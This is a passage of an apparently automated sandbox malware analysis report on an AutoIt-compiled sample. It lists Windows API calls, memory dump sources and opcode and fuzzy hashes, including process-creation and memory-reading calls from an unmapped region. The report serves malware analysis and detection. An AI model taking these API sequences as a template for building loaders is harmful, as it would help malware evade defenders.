                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$FileNamePath
                                                                      • String ID: aut
                                                                      • API String ID: 3285503233-3010740371
                                                                      • Opcode ID: a3bc9d102db2f1da93c4cd97f8cbb5a34591bb6ac25c66c52ef82d6adf212780
                                                                      • Instruction ID: 5a07b95d4f2a66afda7ab29d3332e4e06308f160628ce0ec83b9cd509334dc80
                                                                      • Opcode Fuzzy Hash: a3bc9d102db2f1da93c4cd97f8cbb5a34591bb6ac25c66c52ef82d6adf212780
                                                                      • Instruction Fuzzy Hash: 5AD05EB250032867DA30A7A4AC8EFCF3A6CDB04750F0002A1BA55E2091DAB59984CBD0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,00000000), ref: 00111B2D
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00111B73
                                                                      • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 00111E7C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CreateMemoryReadTerminate
                                                                      • String ID:
                                                                      • API String ID: 2831168122-0
                                                                      • Opcode ID: a08d661af1579fd21ac3dcfb20f4bf99dc511b72db546338f3390fc10d84f6f3
                                                                      • Instruction ID: c47929bd4a5fdbd7679c423b1e546ca03c30c6deeeb756ccc637657a4ef3ef80
                                                                      • Opcode Fuzzy Hash: a08d661af1579fd21ac3dcfb20f4bf99dc511b72db546338f3390fc10d84f6f3
                                                                      • Instruction Fuzzy Hash: AF62F930A14258DBEB28CFA4C851BDEB376EF58300F1091A9D60DEB394E7759E81CB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C282F5
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00C282FC
                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C284DD
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                      • String ID:
                                                                      • API String ID: 146820519-0
                                                                      • Opcode ID: 13beab4a3d7b9b8e142ddbb8c422d257ed677be11b415484661607592e980648
                                                                      • Instruction ID: f7ed40220d91022090ce5a1f1b738f169c89b3ced2a2b4a2d71399bc9ab508ed
                                                                      • Opcode Fuzzy Hash: 13beab4a3d7b9b8e142ddbb8c422d257ed677be11b415484661607592e980648
                                                                      • Instruction Fuzzy Hash: 70127C719083119FD714DF28D484B6ABBE1FF89318F04895DE8998B252CB31ED49CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73721f3aa7ede0b81baf5642a6bae919def0cdee38a1aef1e1adabd1536ba49f
                                                                      • Instruction ID: f7c454ec3ceb878cd7bd132df6b981b8d80bc70cd255905d1f68cf0b3bfeaa11
                                                                      • Opcode Fuzzy Hash: 73721f3aa7ede0b81baf5642a6bae919def0cdee38a1aef1e1adabd1536ba49f
                                                                      • Instruction Fuzzy Hash: 17517D7191060AABDB319FA8C885FAEFBF8EF45310F1800DBF405AB391E6719941DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001), ref: 00BA556D
                                                                      • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00BA557D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 5e0fbbf403e02154aba11aace2cd734b236cb9634d27b3b687f428999d72bb8a
                                                                      • Instruction ID: 33d72ecd36dcd5358663fbbe29fe6ff29523ed6510b5d883d4abda104001fc3a
                                                                      • Opcode Fuzzy Hash: 5e0fbbf403e02154aba11aace2cd734b236cb9634d27b3b687f428999d72bb8a
                                                                      • Instruction Fuzzy Hash: 59316C71A04A09EFDB24CF68C881B9DB7F6FB48714F14826AE91997240D771FE94CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00C12FF2
                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C13006
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C1300D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleTime
                                                                      • String ID:
                                                                      • API String ID: 3397143404-0
                                                                      • Opcode ID: fbcc368de16dc81a2d79be1a2fce99e801a517c56b8c789be36b779e882960ff
                                                                      • Instruction ID: 68da2fbcbd2aab7459757291cd615752c7d2aa9bd922b47d1376cb45d29b52d4
                                                                      • Opcode Fuzzy Hash: fbcc368de16dc81a2d79be1a2fce99e801a517c56b8c789be36b779e882960ff
                                                                      • Instruction Fuzzy Hash: 61E0863229021077D6301755BC4DFCF3A5CD78AB75F104210F729750D046A0560163A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 00BB17F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID: CALL
                                                                      • API String ID: 1385522511-4196123274
                                                                      • Opcode ID: d283efd980ac046cb429d0ebbda818f045ecdf590454abc7b986bbed2f4301fc
                                                                      • Instruction ID: d2206001ee52aeda8c9ccada2d0c0104b1bd0ebb2f710cbc4ac630587cf6ad56
                                                                      • Opcode Fuzzy Hash: d283efd980ac046cb429d0ebbda818f045ecdf590454abc7b986bbed2f4301fc
                                                                      • Instruction Fuzzy Hash: 36228B706082019FC714DF18C8A0ABABBF1FF95314F5489ADF9968B361D7B1E845CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C16F6B
                                                                        • Part of subcall function 00BA4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EFD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad_wcslen
                                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                                      • API String ID: 3312870042-2806939583
                                                                      • Opcode ID: 9e313aedbf13bd1e7d1e1f4d8947b3022c2a119bfc969c1e85ff395aeefdcd8b
                                                                      • Instruction ID: e1acfa9cd035f1a4253efcd85755e9f7ca2fa85a82bb7cba61cdba06d6f69971
                                                                      • Opcode Fuzzy Hash: 9e313aedbf13bd1e7d1e1f4d8947b3022c2a119bfc969c1e85ff395aeefdcd8b
                                                                      • Instruction Fuzzy Hash: B3B1743150C3019FCB14EF24C4919AEB7E5AF96310F14899DF496972A2DF30EE89DB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID:
                                                                      • API String ID: 1807457897-3916222277
                                                                      • Opcode ID: ecb9b4a69119c11a387ecb457997e7e7c8717392e88e74a5eca29de57f12d38d
                                                                      • Instruction ID: 352c7a953d1e308001acc1475b64588281833be16186d5e535e901435eee5bf0
                                                                      • Opcode Fuzzy Hash: ecb9b4a69119c11a387ecb457997e7e7c8717392e88e74a5eca29de57f12d38d
                                                                      • Instruction Fuzzy Hash: AC412B705043499ADF268E64CC94BFAFFE9EF45304F2404EEE58A87242E6399A45DF60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00BE2C8C
                                                                        • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                                        • Part of subcall function 00BA2DA5: GetLongPathNameW.KERNELBASE ref: 00BA2DC4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                      • String ID: X
                                                                      • API String ID: 779396738-3081909835
                                                                      • Opcode ID: 95a48a941a9b44382e9f4d7cc5b3478d86dab1a11104650d8ae828deadec7314
                                                                      • Instruction ID: 25e8497650a6088b0e23833026a7cea828c51614985f02fd09bd3e5fbf24a12f
                                                                      • Opcode Fuzzy Hash: 95a48a941a9b44382e9f4d7cc5b3478d86dab1a11104650d8ae828deadec7314
                                                                      • Instruction Fuzzy Hash: 8921C371A04298AFDF01DF98C845BEE7BFCAF49304F004099E405A7241DFB45A898BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock
                                                                      • String ID: EA06
                                                                      • API String ID: 2638373210-3962188686
                                                                      • Opcode ID: 1ec30852932a1909770c0ca27b73835e75e20b0935543a353e0c1e9596c84ddc
                                                                      • Instruction ID: fbc3b2428c30e001e9f92e21b891a5e0a9f9b0a937c4beffd151a606c6eabf56
                                                                      • Opcode Fuzzy Hash: 1ec30852932a1909770c0ca27b73835e75e20b0935543a353e0c1e9596c84ddc
                                                                      • Instruction Fuzzy Hash: 0101B172944258BEDF28C7A8C856FEEBBF8DB05301F00459EE1A2D21C1E5B4E718DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,?,?,?,?), ref: 00BD34D8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: String
                                                                      • String ID: LCMapStringEx
                                                                      • API String ID: 2568140703-3893581201
                                                                      • Opcode ID: cebac088348e002bb60b7fbae5c79bd15c03a3de42b865c40294164ac7947ae0
                                                                      • Instruction ID: 8e5f4a3050298dbf4a4f9d9cdbe5a6f28b2ed3404e8ca16a524b21b588509279
                                                                      • Opcode Fuzzy Hash: cebac088348e002bb60b7fbae5c79bd15c03a3de42b865c40294164ac7947ae0
                                                                      • Instruction Fuzzy Hash: B401133260020CBBCF125F91DD02EEE7FA6EF08750F044195FE0826271D63A8A31AB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001123EA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: D
                                                                      • API String ID: 963392458-2746444292
                                                                      • Opcode ID: c44042240367ae80eaa8206569f06584b606a7a7c9118113533914ad92b6354f
                                                                      • Instruction ID: ac445f03561a58773acaa1db9152c7ed127af4318bad4ce3d8486ae01bad572b
                                                                      • Opcode Fuzzy Hash: c44042240367ae80eaa8206569f06584b606a7a7c9118113533914ad92b6354f
                                                                      • Instruction Fuzzy Hash: 3001FF71500308ABDB28DFE0CC49FEE7778BB44701F508519FA159A180EB78A698CB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc
                                                                      • String ID: FlsAlloc
                                                                      • API String ID: 2773662609-671089009
                                                                      • Opcode ID: 91ea33f34b16c35828182a077b736df7837c976d5e09ad0106fc6f2087eff8f1
                                                                      • Instruction ID: b439f3aa6e4461f047c4b56cf50355d3109fd3f7c3412c14497ff2d0124e62df
                                                                      • Opcode Fuzzy Hash: 91ea33f34b16c35828182a077b736df7837c976d5e09ad0106fc6f2087eff8f1
                                                                      • Instruction Fuzzy Hash: 48E0E531744318B797206BA09C47F6DBBD4EF54B21B4001AAFD0567351E9B05F0196DA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • try_get_function.LIBVCRUNTIME ref: 00BC3615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: try_get_function
                                                                      • String ID: FlsAlloc
                                                                      • API String ID: 2742660187-671089009
                                                                      • Opcode ID: 3207f6c981d7880c9fcfd17f8e9d0732a33f1fb5c7d40eb67883ac8592685e54
                                                                      • Instruction ID: 3f7b77c6ae9abb660c879f6a2674528e3af1d3da0ba3ed8241f05668d00dd619
                                                                      • Opcode Fuzzy Hash: 3207f6c981d7880c9fcfd17f8e9d0732a33f1fb5c7d40eb67883ac8592685e54
                                                                      • Instruction Fuzzy Hash: 41D01232A9972467C6502AD4AD06FADBBC4DB05FA2F4444B5FD086529195518A1146C1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BDC74F: GetOEMCP.KERNEL32(00000000), ref: 00BDC77A
                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BDCA1D,?,00000000), ref: 00BDCBF0
                                                                      • GetCPInfo.KERNEL32(00000000,00BDCA1D,?,?,?,00BDCA1D,?,00000000), ref: 00BDCC03
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CodeInfoPageValid
                                                                      • String ID:
                                                                      • API String ID: 546120528-0
                                                                      • Opcode ID: eb28a8da3c5889590f1be3578eaef9a87ed51b5a888b34e14221683fc393202b
                                                                      • Instruction ID: 9e0916953299c518e46131bc2af9a08547f5a4da4f2c25750fc4e91c0369e7a3
                                                                      • Opcode Fuzzy Hash: eb28a8da3c5889590f1be3578eaef9a87ed51b5a888b34e14221683fc393202b
                                                                      • Instruction Fuzzy Hash: 9A511070A102479EDB209F65C8816BAFFE5EF41300F1881BFD19A8A361E6359942DBD0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BD2D74: GetLastError.KERNEL32(?,?,00BD5686,00BE3CD6,?,00000000,?,00BD5B6A,?,?,?,?,?,00BCE6D1,?,00C68A48), ref: 00BD2D78
                                                                        • Part of subcall function 00BD2D74: _free.LIBCMT ref: 00BD2DAB
                                                                        • Part of subcall function 00BD2D74: SetLastError.KERNEL32(00000000,?,?,?,?,00BCE6D1,?,00C68A48,00000010,00BA4F4A,?,?,00000000,00BE3CD6), ref: 00BD2DEC
                                                                        • Part of subcall function 00BD2D74: _abort.LIBCMT ref: 00BD2DF2
                                                                        • Part of subcall function 00BDCADA: _abort.LIBCMT ref: 00BDCB0C
                                                                        • Part of subcall function 00BDCADA: _free.LIBCMT ref: 00BDCB40
                                                                        • Part of subcall function 00BDC74F: GetOEMCP.KERNEL32(00000000), ref: 00BDC77A
                                                                      • _free.LIBCMT ref: 00BDCA33
                                                                      • _free.LIBCMT ref: 00BDCA69
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorLast_abort
                                                                      • String ID:
                                                                      • API String ID: 2991157371-0
                                                                      • Opcode ID: 2525041da4492944343391d36753f5a107bc4cd0bdc47483b46e16a7be6acc73
                                                                      • Instruction ID: 3c2182767b87e57cc53311f0dfeec5e3272a809ac22bc2f84a3dc0356add0d84
                                                                      • Opcode Fuzzy Hash: 2525041da4492944343391d36753f5a107bc4cd0bdc47483b46e16a7be6acc73
                                                                      • Instruction Fuzzy Hash: 0531AF3190424AAFDB11EBA9D481BADFBE5EF40320F2101DBE8049B3A2FB759D41DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(00000000,00BA1129,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue,00C42290,FlsSetValue,00000000,00000364,?,00BD2E46,00000000), ref: 00BD3037
                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BD3044
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
